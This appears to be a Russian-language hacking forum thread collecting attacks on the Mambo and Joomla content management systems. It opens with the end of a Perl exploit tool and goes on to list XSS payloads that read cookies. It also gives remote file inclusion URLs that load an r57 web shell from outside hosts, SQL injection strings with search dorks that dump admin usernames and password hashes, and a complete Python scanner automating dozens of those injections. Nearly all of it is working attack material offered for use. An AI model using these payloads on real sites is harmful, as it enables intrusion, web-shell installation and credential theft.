$InfoWindow->add('Label', -text => 'Greetz For my friends;-)', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

system("start $url$shell_path$cmd");
$InfoWindow->Show();
}
# www.Hack-Teach.com , www.4azhar.com ]

Xss

Mambo Server 4.5

Удаленный пользователь может выполнить XSS нападение. Выполнение произвольного PHP кода:

Код:

http://[target]/includes/Cache/Lite/Function.php? mosConfig_absolute_path=http://[attacker]/

А вот и ксс

Код:

http://[target]/index.php?option=com_content&task =view&id=18&Itemid=39"><script>alert(document.cookie) &a&%20I%20am%20an%20XSS%20Problem</h1> 










 

<&http://<site-with-mambo>/index.php? option=com_content&task=view&id=15&Itemid=2 &limit=1"><script>alert(document.cookie)</script> &limitstart=1

PHP Инклудинг

MambelFish

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_mambelfish/ mambelfish.class.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.

Код:

[url]http://victim/[/url][path]/administrator/components/com_mambelfish/
mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

4.5.2

Уязвимость позволяет удаленному пользователю выполнить произвольный php сценарий на уязвимой системе. Уязвимость существует в сценарии '/includes/Archive/Tar.php' при обработке значения переменной 'mosConfig_absolute_path', которая должна указывать на местонахождение сценария '/includes/PEAR/PEAR.php'. Если на целевом сервере включена опция register_globals, удаленный пользователь может с помощью специально сформированного URL изменить значение переменной 'mosConfig_absolute_path' и выполнить произвольный код на системе с привилегиями web сервера.

Код:

http://[target]/mambo/includes/archive/Tar.php? GLOBALS[mosConf ig_absolute_path]=http://[attacker]/

Код:

http://[target]/mambo/includes/archive/Tar.php? mosConfig_absolute_path=http://[attacker]/

Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple 

Код:

=======================================================
Script Site :
http://www.jxdevelopment.com/component/option,com_remository/Itemid,0/func,
fileinfo/id,4/
==============================================
File : /components/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_com_articles.
php');     <=
Line 65
======
http://site/joomla_path/components/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
========================================================
File : /classes/html/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_articles.
php');     <= Line
24
======
http://site/joomla_path/classes/html/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=========================================================

Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln 

Код:

============================================================
Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln
============================================================
Found By : Cold z3ro , Cold-z3ro@Hotmail.com
============================================================
Homepage: www.Hack-Teach.com
============================================================
Script :
http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,47/chk,
a39037e15bb5cd125f3cfd9dccaec6f5/no_html,1.html
============================================================
File : /mod_weather.php
include($absolute_path.'/language/'.$lang.'/lang_mod_weather.
php');
============================================================
http://site/{path}/modules/mod_weather.php?absolute_path=http://nachrichtenmann.de/r57.txt?
============================================================

Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln

Код:

==================================================================
Mambo module Calendar (Agenda) <= 155 (com_calendar.php) Multiple RFI Vuln
==================================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================================
Homepage: www.Hack-Teach.com
==================================================================
Script :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x/Calendar&
i=agenda-155.zip
==================================================================
File : /com_calendar.php
include($absolute_path.'/components/calendar/cal_config.php');
==================================================================
/components/calendar/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/calendar/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
Or
/components/com_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_calendar.php?absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================================

Mambo Component com_ahsshop SQL Injection

Код:

##########################################
#
# Mambo Component com_ahsshop SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "com_ahsshop"do=default
#
###########################################
EXPLOiT 1 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*

EXPLOiT 2 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*


###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

side note:
	<name>ahsshop</name>
	<creationDate>15.07.2004</creationDate>
	<author>Arn�r Hei�ar fyrir Netvistun ehf.</author>
	<copyright>Allur h�fundarr�ttur �skilinn</copyright>
	<authorEmail>arnor@netvistun.is</authorEmail>

	<authorUrl>www.netvistun.is</authorUrl>
	<version>1.51</version>
	<description>Kerfi �tla� til a� kynna v�rur og v�ruflokka eftir ver�um</description>

MamScan v1.0

Mambo Component SQL scanner

Код:

#!/usr/bin/python
#Mambo Component SQL scanner, checks source for md5's

#Uncomment line 44 for verbose mode. If md5 found
#check manually.

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, time

print "\n\t   d3hydr8[at]gmail[dot]com MamScan v1.0"
print "\t------------------------------------------"

sqls = ["index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*",
"index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*",
"index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
"index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--",
"index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*",
"index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*",
"index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*",
"index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN",
"index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*", "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
"index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*",
"index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/*",
"index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
"index.php?option=com_rapidrecipe&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_rapidrecipe&category_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--",
"administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",
"index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*",
"index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*",
"index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*",
"index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*",
"index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--",
"index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*",
"index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*",
"index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
"index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
"index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/*",
"index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--"]

if len(sys.argv) != 2:
	print "\nUsage: ./mamscan.py <site>"
	print "Ex: ./mamscan.py www.test.com\n"
	sys.exit(1)

host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
	host = host+"/"
if host[:7] != "http://":
	host = "http://"+host
	
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls) 

print "[+] Starting Scan...\n" 
for sql in sqls:
	time.sleep(3) #Change this if needed
	#print "[+] Trying:",host+sql.replace("\n","")
	try:
  source = urllib2.urlopen(host+sql.replace("\n","")).read()
  md5s = re.findall("[a-f0-9]"*32,source)
  if len(md5s) >= 1:
  	print "[!]",host+sql.replace("\n","")
  	for md5 in md5s:
    print "\n[+]MD5:",md5
	except(urllib2.HTTPError):
  pass
print "\n[-] Done\n"

Уязвимости: Mambo

Winux

Старожил форума

Ŧ1LAN

CPU register

not null

(L2) cache

baltazar

RAID-массив